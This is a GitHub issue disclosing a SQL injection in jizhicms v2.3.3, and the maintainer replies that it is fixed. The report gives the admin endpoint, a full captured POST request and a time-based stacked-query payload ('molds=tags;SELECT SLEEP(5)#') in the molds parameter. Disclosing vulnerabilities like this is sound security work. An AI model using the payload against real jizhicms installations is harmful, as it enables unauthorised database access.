### ISSUE TITLE
jizhicms v2.3.3 has a vulnerability, SQL injection

### ISSUE THREAD

**Issue by Zoe0427** [Cherry-toto/jizhicms#83]
This is one of my favorite CMS, but I found a system vulnerability.
name：jizhicms
version: v2.3.3
Installation package [download：](https://github.com/Cherry-toto/jizhicms)
![image](https://user-images.githubusercontent.com/75592724/201055280-15c1038f-c9b6-4645-bc49-f77db146bafc.png)
Problematic packets:

> POST /index.php/admins/Fields/get_fields.html HTTP/1.1
> Host: 192.168.23.130:49158
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
> Accept: */*
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
> X-Requested-With: XMLHttpRequest
> Content-Length: 21
> Origin: http://192.168.23.130:49158
> Connection: close
> Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html
> Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs
> 
> molds=tags&tid=0&id=1

Background ->SEO settings ->TGA list ->edit, and then capture packages
![image](https://user-images.githubusercontent.com/75592724/201058690-e66eb21a-ef71-4881-a0b0-60f51ad9ebec.png)
![image](https://user-images.githubusercontent.com/75592724/201058822-3b947f4f-b6d5-4511-865d-29f2b0f24aa2.png)

![image](https://user-images.githubusercontent.com/75592724/201058391-27036e72-a133-4b74-a083-57a07dbc89eb.png)
Vulnerability verification exists

payload

```
Parameter: molds (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3
```

**Comment by Cherry-toto** [comment]
感谢！已修复
